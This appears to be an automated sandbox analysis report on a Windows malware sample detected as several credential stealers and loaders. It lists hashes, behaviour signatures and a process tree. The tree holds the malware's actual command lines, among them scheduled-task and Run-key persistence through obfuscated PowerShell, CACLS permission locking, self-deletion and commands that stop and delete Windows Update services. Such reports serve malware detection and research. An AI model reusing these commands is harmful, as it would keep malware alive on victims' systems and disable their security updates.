Edit tour
Windows
Analysis Report
DQxttu2Qrr.exe
Overview
General Information
| Sample Name: | DQxttu2Qrr.exe |
| Analysis ID: | 764033 |
| MD5: | 7434b42e11380272961c92e061072e78 |
| SHA1: | a2dea715e33a860dc09d09b219db18831e6bb1a5 |
| SHA256: | 9922432bfa7768bdfb6e8b079c90744c9f3d33a5a258a97abc8519f81a680e40 |
| Tags: | 32ArkeiStealerexetrojan |
| Infos: |  |
 | |
Detection
Amadey, Laplas Clipper, RedLine, SystemBC, Vidar
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Yara detected Laplas Clipper
System process connects to network (likely due to code injection or exploit)
Yara detected SystemBC
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Creates multiple autostart registry keys
Query firmware table information (likely to detect VMs)
Uses cmd line tools excessively to alter registry or file data
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect debuggers (CloseHandle check)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses powercfg.exe to modify the power settings
Hides threads from debuggers
Modifies power options to not sleep / hibernate
Overwrites code with function prologues
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Modifies the hosts file
Yara detected Generic Downloader
Found hidden mapped module (file has been removed from disk)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Checks if the current process is being debugged
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
PE / OLE file has an invalid certificate
Classification
- System is w10x64
DQxttu2Qrr.exe (PID: 2508 cmdline: C:\Users\u ser\Deskto p\DQxttu2Q rr.exe MD5: 7434B42E11380272961C92E061072E78) 
61312899942613011832.exe (PID: 5372 cmdline: "C:\Progra mData\6131 2899942613 011832.exe " MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B) - gntuud.exe (PID: 5780 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\03bd54 3fce\gntuu d.exe" MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B) 
schtasks.exe (PID: 5908 cmdline: "C:\Window s\System32 \schtasks. exe" /Crea te /SC MIN UTE /MO 1 /TN gntuud .exe /TR " C:\Users\u ser\AppDat a\Local\Te mp\03bd543 fce\gntuud .exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04) 
conhost.exe (PID: 5920 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5928 cmdline:
"C:\Window s\System32 \cmd.exe" /k echo Y| CACLS "gnt uud.exe" / P "user:N" &&CACLS "g ntuud.exe" /P "user: R" /E&&ech o Y|CACLS "..\03bd54 3fce" /P " user:N"&&C ACLS "..\0 3bd543fce" /P "user: R" /E&&Exi t MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5996 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho Y" MD5: F3BDBE3BB6F734E357235F4D5898582D) - cacls.exe (PID: 6004 cmdline:
CACLS "gnt uud.exe" / P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) - cacls.exe (PID: 6024 cmdline:
CACLS "gnt uud.exe" / P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) - cmd.exe (PID: 6064 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho Y" MD5: F3BDBE3BB6F734E357235F4D5898582D) - cacls.exe (PID: 6076 cmdline:
CACLS "..\ 03bd543fce " /P "user :N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) - cacls.exe (PID: 6096 cmdline:
CACLS "..\ 03bd543fce " /P "user :R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) 
rundll32.exe (PID: 6128 cmdline: "C:\Window s\System32 \rundll32. exe" C:\Us ers\user\A ppData\Roa ming\c33e9 ad058e5d3\ cred64.dll , Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) 
Emit64.exe (PID: 3920 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\100001 7001\Emit6 4.exe" MD5: 7A5155B804E592D83F8319CBDB27E164) 
powershell.exe (PID: 3044 cmdline: C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# qgoyddbo#> IF((New-O bject Secu rity.Princ ipal.Windo wsPrincipa l([Securit y.Principa l.WindowsI dentity]:: GetCurrent ())).IsInR ole([Secur ity.Princi pal.Window sBuiltInRo le]::Admin istrator)) { IF([Sys tem.Enviro nment]::OS Version.Ve rsion -lt [System.Ve rsion]"6.2 ") { schta sks /creat e /f /sc o nlogon /rl highest / tn 'RtkAud UService64 .exe' /tr '''C:\User s\user\Loc ktime\RtkA udUService 64.exe''' } Else { R egister-Sc heduledTas k -Action (New-Sched uledTaskAc tion -Exec ute 'C:\Us ers\user\L ocktime\Rt kAudUServi ce64.exe') -Trigger (New-Sched uledTaskTr igger -AtL ogOn) -Set tings (New -Scheduled TaskSettin gsSet -All owStartIfO nBatteries -Disallow HardTermin ate -DontS topIfGoing OnBatterie s -DontSto pOnIdleEnd -Executio nTimeLimit (New-Time Span -Days 1000)) -T askName 'R tkAudUServ ice64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "H KCU\SOFTWA RE\Microso ft\Windows \CurrentVe rsion\Run" /v "RtkAu dUService6 4.exe" /t REG_SZ /f /d 'C:\Use rs\user\Lo cktime\Rtk AudUServic e64.exe' } MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
avicapn32.exe (PID: 1112 cmdline: "C:\Users\ user\10000 18002\avic apn32.exe" MD5: 0F6EF96C5E687631EF27F1DCD1AFE7B4) - rundll32.exe (PID: 2820 cmdline:
"C:\Window s\System32 \rundll32. exe" C:\Us ers\user\1 000019012\ syncfiles. dll, rundl l MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) 
umciavi64.exe (PID: 68 cmdline: "C:\Users\ user\AppDa ta\Roaming \100002000 0\umciavi6 4.exe" MD5: 8F727EA574C46E3FD8901335A6548285) - cmd.exe (PID: 5596 cmdline:
"C:\Window s\System32 \cmd.exe" /c timeout /t 6 & de l /f /q "C :\Users\us er\Desktop \DQxttu2Qr r.exe" & e xit MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5604 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - timeout.exe (PID: 5636 cmdline:
timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
- gntuud.exe (PID: 4948 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\03bd543 fce\gntuud .exe MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B)
- cmd.exe (PID: 1500 cmdline:
C:\Windows \System32\ cmd.exe /c sc stop U soSvc & sc stop WaaS MedicSvc & sc stop w uauserv & sc stop bi ts & sc st op dosvc & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\UsoSvc" /f & reg d elete "HKL M\SYSTEM\C urrentCont rolSet\Ser vices\WaaS MedicSvc" /f & reg d elete "HKL M\SYSTEM\C urrentCont rolSet\Ser vices\wuau serv" /f & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\bits" /f & reg del ete "HKLM\ SYSTEM\Cur rentContro lSet\Servi ces\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 3076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - sc.exe (PID: 5040 cmdline:
sc stop Us oSvc MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 3400 cmdline:
sc stop Wa aSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 4616 cmdline:
sc stop wu auserv MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 5488 cmdline:
sc stop bi ts MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 5224 cmdline:
sc stop do svc MD5: D79784553A9410D15E04766AAAB77CD6) - reg.exe (PID: 5848 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \UsoSvc" / f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 5772 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \WaaSMedic Svc" /f MD5: E3DACF0B31841FA02064B4457D44B357)